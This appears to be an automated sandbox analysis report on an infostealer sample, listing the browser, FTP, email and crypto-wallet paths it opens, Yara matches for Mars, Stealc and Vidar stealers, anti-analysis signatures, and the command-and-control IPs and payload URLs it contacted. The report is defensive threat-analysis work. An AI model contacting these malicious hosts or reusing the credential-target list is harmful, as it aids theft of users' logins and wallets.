Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: Wf9qnVcbi8.exe PID: 1864, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.2.Wf9qnVcbi8.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.528307a0ac.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2715962638.0000000000551000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189641658.00000000005D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000000D.00000002.2717126137.000000000185E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2198516833.0000000001655000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wf9qnVcbi8.exe PID: 1864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 528307a0ac.exe PID: 7620, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.Wf9qnVcbi8.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.528307a0ac.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2715962638.0000000000551000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189641658.00000000005D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wf9qnVcbi8.exe PID: 1864, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1465786 Sample: Wf9qnVcbi8.exe Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 63 Snort IDS alert for network traffic 2->63 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 16 other signatures 2->69 8 Wf9qnVcbi8.exe 37 2->8         started        13 explorti.exe 16 2->13         started        15 explorti.exe 2->15         started        process3 dnsIp4 49 85.28.47.4, 49704, 54804, 80 GES-ASRU Russian Federation 8->49 51 77.91.77.81, 49705, 54802, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 8->51 37 C:\Users\user\AppData\...\IDGHDGIDAK.exe, PE32 8->37 dropped 39 C:\Users\user\AppData\...\softokn3[1].dll, PE32 8->39 dropped 41 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 8->41 dropped 47 11 other files (7 malicious) 8->47 dropped 87 Detected unpacking (changes PE section rights) 8->87 89 Tries to steal Mail credentials (via file / registry access) 8->89 91 Found many strings related to Crypto-Wallets (likely being stolen) 8->91 99 4 other signatures 8->99 17 cmd.exe 1 8->17         started        19 cmd.exe 2 8->19         started        53 77.91.77.82, 54801, 54803, 54805 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 13->53 43 C:\Users\user\AppData\...\528307a0ac.exe, PE32 13->43 dropped 45 C:\Users\user\AppData\Local\...\random[1].exe, PE32 13->45 dropped 93 Hides threads from debuggers 13->93 95 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->95 97 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->97 21 528307a0ac.exe 12 13->21         started        file5 signatures6 process7 signatures8 24 IDGHDGIDAK.exe 4 17->24         started        28 conhost.exe 17->28         started        30 conhost.exe 19->30         started        71 Antivirus detection for dropped file 21->71 73 Multi AV Scanner detection for dropped file 21->73 75 Detected unpacking (changes PE section rights) 21->75 77 2 other signatures 21->77 process9 file10 35 C:\Users\user\AppData\Local\...\explorti.exe, PE32 24->35 dropped 79 Antivirus detection for dropped file 24->79 81 Detected unpacking (changes PE section rights) 24->81 83 Machine Learning detection for dropped file 24->83 85 5 other signatures 24->85 32 explorti.exe 24->32         started        signatures11 process12 signatures13 55 Antivirus detection for dropped file 32->55 57 Detected unpacking (changes PE section rights) 32->57 59 Tries to detect sandboxes and other dynamic analysis tools (window names) 32->59 61 6 other signatures 32->61
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU false
85.28.47.4
 unknown Russian Federation
31643 GES-ASRU true
77.91.77.82
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.81/mine/amadka.exe true
  • 27%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://77.91.77.82/Hun4Ko/index.php true
  • 24%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.4/69934896f997d5bb/softokn3.dll true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/mozglue.dll true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/nss3.dll true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dll true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/920475a59bac849d.php true
  • 23%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll true
  • Avira URL Cloud: malware
 unknown
85.28.47.4/920475a59bac849d.php true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/msvcp140.dll true
  • Avira URL Cloud: malware
 unknown